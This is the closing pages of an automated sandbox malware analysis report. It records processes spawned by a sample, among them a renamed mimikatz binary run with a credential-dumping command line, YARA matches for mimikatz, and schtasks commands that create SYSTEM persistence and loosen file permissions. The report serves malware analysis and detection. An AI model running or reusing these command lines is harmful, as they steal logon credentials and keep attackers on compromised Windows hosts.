Commandline: cmd /c C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\5c2a55da8\Corporate\log.txt
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c cd C:\Windows\5c2a55da8\usbprohub\ & C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Analysis Process: cmd.exe PID: 1252 Parent PID: 3356Analysis Process: cmd.exe PID: 1252 Parent PID: 3356
General
Analysis Process: cmd.exe PID: 1524 Parent PID: 3356Analysis Process: cmd.exe PID: 1524 Parent PID: 3356
General
Analysis Process: conhost.exe PID: 3968 Parent PID: 1252Analysis Process: conhost.exe PID: 3968 Parent PID: 1252
General
Analysis Process: conhost.exe PID: 1068 Parent PID: 1524Analysis Process: conhost.exe PID: 1068 Parent PID: 1524
Copyright Joe Security LLC 2019 Page 67 of 69
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\5c2a55da8\Corporate\vfshost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
Imagebase: 0x7ff607270000
File size: 390304 bytes
MD5 hash: FD5EFCCDE59E94EEC8BB2735AA577B2B
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 00000024.00000002.6192286869.00007FF607342000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: Powerkatz_DLL_Generic, Description: Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible), Source: 00000024.00000002.6190697970.00007FF607271000.00000040.sdmp, Author: Florian RothRule: mimikatz, Description: mimikatz, Source: 00000024.00000001.6149235365.00007FF607342000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: Powerkatz_DLL_Generic, Description: Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible), Source: 00000024.00000001.6146216390.00007FF607301000.00000080.sdmp, Author: Florian Roth
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
Wow64 process (32bit): true
Commandline: C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe
Imagebase: 0x3c0000
File size: 258046 bytes
MD5 hash: C02C8BE9AFC220F8B7852C619AF784C6
Has administrator privileges: true
Programmed in: C, C++ or other language
General
Analysis Process: vfshost.exe PID: 4240 Parent PID: 1252Analysis Process: vfshost.exe PID: 4240 Parent PID: 1252
General
Analysis Process: ouousbpro.exe PID: 2940 Parent PID: 1524Analysis Process: ouousbpro.exe PID: 2940 Parent PID: 1524
General
Analysis Process: cmd.exe PID: 1644 Parent PID: 3356Analysis Process: cmd.exe PID: 1644 Parent PID: 3356
Copyright Joe Security LLC 2019 Page 68 of 69
Disassembly
Code Analysis
Start time: 17:17:37
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn '93293e638' /ru system /tr 'cmd /c C:\Windows\ime\b158ac7.exe'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:37
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn 'd95544aa8' /ru system /tr 'cmd /c echo Y|cacls C:\Windows\cc3d3243\b158ac7.exe /p everyone:F'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:37
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
General
Analysis Process: cmd.exe PID: 4448 Parent PID: 3356Analysis Process: cmd.exe PID: 4448 Parent PID: 3356
General
Analysis Process: conhost.exe PID: 4244 Parent PID: 1644Analysis Process: conhost.exe PID: 4244 Parent PID: 1644
General
Copyright Joe Security LLC 2019 Page 69 of 69